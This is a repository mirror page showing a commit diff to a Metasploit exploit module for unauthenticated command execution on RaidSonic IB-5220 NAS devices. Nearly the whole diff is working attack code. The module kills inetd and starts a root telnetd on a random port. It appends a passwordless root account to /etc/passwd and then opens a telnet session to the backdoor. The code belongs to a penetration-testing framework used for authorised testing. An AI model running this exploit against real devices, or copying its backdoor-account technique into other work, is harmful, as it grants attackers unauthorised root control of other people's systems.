infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

thx to juan ... session stuff looks better

bug/bundler_fix
m-1-k-3 2013-08-14 16:51:09 +02:00
parent 885417c9d9
commit 6b87240323
1 changed files with 63 additions and 56 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

117
modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
View File

@ -41,63 +41,57 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Feb 04 2013',
'Privileged' => true,
'Platform' => ['linux','unix'],
'Payload' =>
'Payload' =>
{
'DisableNops' => true,
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'Targets' =>
[
[ 'CMD', #all devices
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Telnet', #all devices - default target
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Automatic', { } ],
],
'DefaultTarget' => 1
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']),
], self.class)
register_advanced_options(
[
OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
], self.class)
end
def tel_timeout
(datastore['TelnetTimeout'] || 10).to_i
end
def banner_timeout
(datastore['TelnetBannerTimeout'] || 25).to_i
end
def exploit
@response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
if target.name =~ /CMD/
exploit_cmd
else
exploit_telnet
end
end
def exploit_cmd
if not (datastore['CMD'])
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
print_status("#{rhost}:#{rport} - Sending remote command")
res = request(payload.encoded)
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")
return
exploit_telnet
end
def exploit_telnet
telnetport = rand(65535)
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
#first request
cmd = "killall inetd"
cmd = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} - sending first request - killing inetd")
print_status("#{rhost}:#{rport} - sending first request - killing inetd")
res = request(cmd)
#no server header or something that we could use to get sure the command is executed
@ -109,7 +103,8 @@ class Metasploit3 < Msf::Exploit::Remote
inetd_cfg = rand_text_alpha(8)
cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
cmd = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} - sending second request - configure inetd")
print_status("#{rhost}:#{rport} - sending second request - configure inetd")
register_file_for_cleanup("/tmp/#{inetd_cfg}")
res = request(cmd)
#no server header or something that we could use to get sure the command is executed
@ -120,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
#third request
cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"
cmd = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
res = request(cmd)
#no server header or something that we could use to get sure the command is executed
@ -132,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
user = rand_text_alpha(6)
cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd"
cmd = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}")
print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}")
res = request(cmd)
#no server header or something that we could use to get sure the command is executed
@ -140,12 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
begin
print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock
print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
add_socket(sock)
else
if sock.nil?
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
end
@ -160,18 +153,17 @@ class Metasploit3 < Msf::Exploit::Remote
:active => true
}
report_auth_info(auth_info)
merge_me = {
'USERPASS_FILE' => nil,
'USER_FILE' => nil,
'PASS_FILE' => nil,
'USERNAME' => user,
'PASSWORD' => nil
}
prompt = negotiate_telnet(sock)
if prompt.nil?
sock.close
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
else
print_good("#{rhost}:#{rport} - Telnet session successfully established...")
end
sock.put(user)
sock.put("\r\n")
sock.put("rm /tmp/#{inetd_cfg}")
sock.put("\r\n")
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
handler(sock)
rescue
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
end
@ -209,4 +201,19 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
def negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, tel_timeout)
return nil if not data or data.length == 0
if data =~ /login/
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end
end